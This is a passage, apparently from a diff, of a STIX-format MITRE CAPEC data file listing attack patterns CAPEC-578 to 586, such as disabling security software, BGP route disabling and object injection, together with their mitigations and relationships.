detection does not occur. 
This can take the form of killing processes, deleting registry keys so that tools do not start at run time, deleting log files, or other methods.", + "external_references": [ + { + "external_id": "CAPEC-578", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/578.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Modify Authentication Process: Multi-Factor Authentication", + "external_id": "T1556.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1556/006" + }, + { + "description": "Impair Defenses: Disable or Modify Tools", + "external_id": "T1562.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/001" + }, + { + "description": "Impair Defenses: Disable Windows Event Logging", + "external_id": "T1562.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/002" + }, + { + "description": "Impair Defenses: Disable or Modify System Firewall", + "external_id": "T1562.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/004" + }, + { + "description": "Impair Defenses: Disable or Modify Cloud Firewall", + "external_id": "T1562.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/007" + }, + { + "description": "Impair Defenses: Disable Cloud Logs", + "external_id": "T1562.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/008" + }, + { + "description": "Impair Defenses: Safe Mode Boot", + "external_id": "T1562.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/009" + } + ], + "id": "attack-pattern--a2f42e82-a184-4df7-a8bb-6fc34787d571", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Disable Security Software", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_consequences": { + "Availability": [ + "Hide Activities (By disabling certain security tools, the adversary can hide malicious activity and avoid detection.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the capability to interact with the configuration of the targeted system." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Usable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are in place to prevent adversaries from altering the execution status of security tools.", + "id": "course-of-action--be1b899d-d3f2-4d8f-807f-c8a13d7c193c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-578-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--99491706-558f-487d-aa01-04a8b8b5a6f5", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1b899d-d3f2-4d8f-807f-c8a13d7c193c", + "spec_version": "2.1", + "target_ref": "attack-pattern--a2f42e82-a184-4df7-a8bb-6fc34787d571", + "type": "relationship", + "x_capec_version": "3.9" 
+ }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Winlogon is a part of Windows that performs logon actions. In Windows systems prior to Windows Vista, a registry key can be modified that causes Winlogon to load a DLL on startup. Adversaries may take advantage of this feature to load adversarial code at startup.", + "external_references": [ + { + "external_id": "CAPEC-579", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/579.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "Boot or Logon Autostart Execution: Winlogon helper DLL", + "external_id": "T1547.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547/004" + } + ], + "id": "attack-pattern--9927fda8-927b-4327-b3f8-bcbd0467c702", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Replace Winlogon Helper DLL", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Changes to registry entries in \"HKLM\\Software\\Microsoft\\Windows NT\\Winlogon\\Notify\" that do not correlate with known software, patch cycles, etc are suspicious. 
New DLLs written to System32 which do not correlate with known good software or patching may be suspicious.", + "id": "course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-579-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c9851cf-e6d2-463b-a389-c4c108572a95", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b", + "spec_version": "2.1", + "target_ref": "attack-pattern--9927fda8-927b-4327-b3f8-bcbd0467c702", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary identifies a Rest HTTP (Get, Put, Delete) style permission method allowing them to perform various malicious actions upon server data due to lack of access control mechanisms implemented within the application service accepting HTTP messages.", + "external_references": [ + { + "external_id": "CAPEC-58", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/58.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "external_id": "CWE-269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html" + }, + { + "description": "Mark O'Neill, Security for REST Web Services, Vprde;", + "external_id": "REF-463", + "source_name": "reference_from_CAPEC", + "url": "http://www.vordel.com/downloads/rsa_conf_2006.pdf" + } + ], + 
"id": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Restful Privilege Elevation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware", + "Software" + ], + "x_capec_example_instances": [ + "The HTTP Get method is designed to retrieve resources and not to alter the state of the application or resources on the server side. However, developers can easily code programs that accept a HTTP Get request that do in fact create, update or delete data on the server. Both Flickr (http://www.flickr.com/services/api/flickr.photosets.delete.html) and del.icio.us (http://del.icio.us/api/posts/delete) have implemented delete operations using standard HTTP Get requests. These HTTP Get methods do delete data on the server side, despite being called from Get which is not supposed to alter state." + ], + "x_capec_extended_description": "\n Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side. 
The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker needs to be able to identify HTTP Get URLs. The Get methods must be set to call applications that perform operations other than get such as update and delete." + ], + "x_capec_skills_required": { + "Low": "It is relatively straightforward to identify an HTTP Get method that changes state on the server side and executes against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8f217ad-8701-4a9c-9a22-a4c6022c4f51", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure that HTTP Get methods only retrieve state and do not alter state on the server side", + "id": "course-of-action--b77def1e-db69-4204-b59f-c9ba934af034", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-58-1", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--09b1f116-7e91-47fc-8238-758d20861790", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b77def1e-db69-4204-b59f-c9ba934af034", + "spec_version": "2.1", + "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure that HTTP methods have proper ACLs based on what the functionality they expose", + "id": "course-of-action--4f4d6165-fc50-42ef-9249-e1052676d841", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-58-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4a8f4717-a1fc-4334-8819-fadd7bafdf0f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f4d6165-fc50-42ef-9249-e1052676d841", + "spec_version": "2.1", + "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "An adversary engages in active probing and exploration activities to determine security information about a remote target system. Often times adversaries will rely on remote applications that can be probed for system configurations.", + "external_references": [ + { + "external_id": "CAPEC-580", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/580.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-205", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/205.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "System Information Discovery", + "external_id": "T1082", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1082" + } + ], + "id": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "modified": "2023-01-24T00:00:00.000Z", + "name": "System Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e" + ], + "x_capec_prerequisites": [ + "The adversary must have logical access to the target network and system." + ], + "x_capec_skills_required": { + "Low": "The adversary needs to know basic linux commands." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5ec163f5-ff75-4e9d-ac8d-0bd09b3e9121", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7d31992-837d-4b43-91fb-5fd7cffc161b", + "spec_version": "2.1", + "target_ref": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b970172-c7e3-45aa-a1de-1362a7f5756c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "spec_version": "2.1", + "target_ref": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries may attempt to get a listing of security tools that are installed on the system and their configurations. 
This may include security related system features (such as a built-in firewall or anti-spyware) as well as third-party security software.", + "external_references": [ + { + "external_id": "CAPEC-581", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/581.html" + }, + { + "description": "Software Discovery:Security Software Discovery", + "external_id": "T1518.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1518/001" + } + ], + "id": "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Security Software Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire security tool information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist.", + "id": "course-of-action--5e2e2530-ac1b-4b0a-8889-a7058a982190", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-581-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--679fbac3-8799-4a09-948f-0d9e83b3765f", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": 
"mitigates", + "source_ref": "course-of-action--5e2e2530-ac1b-4b0a-8889-a7058a982190", + "spec_version": "2.1", + "target_ref": "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-14T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary disables the network route between two targets. The goal is to completely sever the communications channel between two entities. This is often the result of a major error or the use of an \"Internet kill switch\" by those in control of critical infrastructure. This attack pattern differs from most other obstruction patterns by targeting the route itself, as opposed to the data passed over the route.", + "external_references": [ + { + "external_id": "CAPEC-582", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/582.html" + } + ], + "id": "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Route Disabling", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Disabling a network route denies the availability of a service.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55", + "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "attack-pattern--3cedbb3a-e97f-4bc7-ac36-2c1f0c360d08" + ], + "x_capec_prerequisites": [ + "The adversary requires knowledge of and access to network route." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, an adversary physically disables networking hardware by powering it down or disconnecting critical equipment. Disabling or shutting off critical system resources prevents them from performing their service as intended, which can have direct and indirect consequences on other systems. This attack pattern is considerably less technical than the selective blocking used in most obstruction attacks.", + "external_references": [ + { + "external_id": "CAPEC-583", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/583.html" + }, + { + "description": "Analysis of Country-wide Internet Outages Caused by Censorship, 2011, Center for Applied Internet Data Analysis", + "external_id": "REF-464", + "source_name": "reference_from_CAPEC", + "url": "http://www.caida.org/publications/papers/2011/outages_censorship/outages_censorship.pdf" + } + ], + "id": "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Disabling Network Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Hardware" + ], + "x_capec_prerequisites": [ + "The adversary requires physical access to the targeted communications equipment (networking devices, cables, etc.), which may be spread over a wide area." 
+ ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure rigorous physical defensive measures to keep the adversary from accessing critical systems..", + "id": "course-of-action--f175c018-1dfe-4c0d-bec0-f5b9afb1d6a7", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-583-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--52c0fc53-41a5-4784-b605-f2404b5643c9", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f175c018-1dfe-4c0d-bec0-f5b9afb1d6a7", + "spec_version": "2.1", + "target_ref": "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary suppresses the Border Gateway Protocol (BGP) advertisement for a route so as to render the underlying network inaccessible. The BGP protocol helps traffic move throughout the Internet by selecting the most efficient route between Autonomous Systems (AS), or routing domains. BGP is the basis for interdomain routing infrastructure, providing connections between these ASs. 
By suppressing the intended AS routing advertisements and/or forcing less effective routes for traffic to ASs, the adversary can deny availability for the target network.", + "external_references": [ + { + "external_id": "CAPEC-584", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/584.html" + }, + { + "description": "Why is it Taking so Long to Secure Internet Routing?, 2014, ACM", + "external_id": "REF-465", + "source_name": "reference_from_CAPEC", + "url": "https://queue.acm.org/detail.cfm?id=2668966" + }, + { + "description": "Beware of BGP Attacks, 2004, ACM SIGCOMM", + "external_id": "REF-466", + "source_name": "reference_from_CAPEC", + "url": "http://www.cc.gatech.edu/~dovrolis/Papers/ccr-bgp.pdf" + } + ], + "id": "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "modified": "2020-12-17T00:00:00.000Z", + "name": "BGP Route Disabling", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Disabling a network route at the routing infrastructure level denies availability of that route.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Blackholing: The adversary intentionally references false routing advertisements in order to attract traffic to a particular router so it can be dropped." 
+ ], + "x_capec_prerequisites": [ + "The adversary must have control of a router that can modify, drop, or introduce spoofed BGP updates.The adversary can convince" + ], + "x_capec_resources_required": [ + "BGP Router" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement Ingress filters to check the validity of received routes. However, this relies on the accuracy of Internet Routing Registries (IRRs) databases which are often not well-maintained.", + "id": "course-of-action--32e9cc12-1ed9-4725-9fd2-d09ced47db65", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-584-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--76b92e8e-8863-490a-a6e4-c241e602b86e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--32e9cc12-1ed9-4725-9fd2-d09ced47db65", + "spec_version": "2.1", + "target_ref": "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement Secure BGP (S-BGP protocol), which improves authorization and authentication capabilities based on public-key cryptography.", + "id": "course-of-action--1c733d77-23ad-4455-b854-996ea0d64125", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-584-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbf5fc63-f216-4101-9b1b-a09e8272547c", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1c733d77-23ad-4455-b854-996ea0d64125", + "spec_version": "2.1", + "target_ref": "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, an adversary influences a target's web-hosting company to disable a target domain. The goal is to prevent access to the targeted service provided by that domain. It usually occurs as the result of civil or criminal legal interventions.", + "external_references": [ + { + "external_id": "CAPEC-585", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/585.html" + }, + { + "description": "Dozens of Online 'Dark Markets' Seized Pursuant to Forfeiture Complaint Filed in Manhattan Federal Court in Conjunction with the Arrest of the Operator of Silk Road 2.0, 2014, FBI", + "external_id": "REF-467", + "source_name": "reference_from_CAPEC", + "url": "https://www.fbi.gov/contact-us/field-offices/newyork/news/press-releases/dozens-of-online-dark-markets-seized-pursuant-to-forfeiture-complaint-filed-in-manhattan-federal-court-in-conjunction-with-the-arrest-of-the-operator-of-silk-road-2.0" + } + ], + "id": "attack-pattern--3cedbb3a-e97f-4bc7-ac36-2c1f0c360d08", + "modified": "2023-01-24T00:00:00.000Z", + "name": "DNS Domain Seizure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", 
+ "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Disabling a target domain at the infrastructure level denies the availability of its service to the user.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The FBI's seizure of gambling websites, the US DOJ's seizure of child pornography websites, and Microsoft's seizure of all domains owned by the company No-IP in order to disrupt a cyberattack originating from a subset of those domains." + ], + "x_capec_prerequisites": [ + "This attack pattern requires that the adversary has cooperation from the registrar of the target domain." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. 
This can result in a number of unwanted outcomes, including remote code execution.", + "external_references": [ + { + "external_id": "CAPEC-586", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/586.html" + }, + { + "external_id": "CWE-502", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/502.html" + }, + { + "description": "Deserialization of Untrusted Data, 2017--01, OWASP", + "external_id": "REF-468", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Object Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands (Functions that assume information in the deserialized object is valid could be exploited.)" + ], + "Availability": [ + "Resource Consumption (If a function is making an assumption on when to terminate, based on a sentry in a string, it could easily never terminate and exhaust available resources.)" + ], + "Integrity": [ + 